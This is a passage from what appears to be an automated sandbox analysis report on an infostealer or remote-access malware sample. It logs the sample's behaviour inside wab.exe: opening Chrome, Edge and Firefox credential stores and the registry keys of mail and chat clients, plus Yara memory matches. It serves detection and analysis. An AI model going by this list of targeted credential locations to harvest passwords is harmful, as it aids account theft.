Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_20EA2264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 17_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041739B GetVersionExW, 16_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 17_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 5664, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs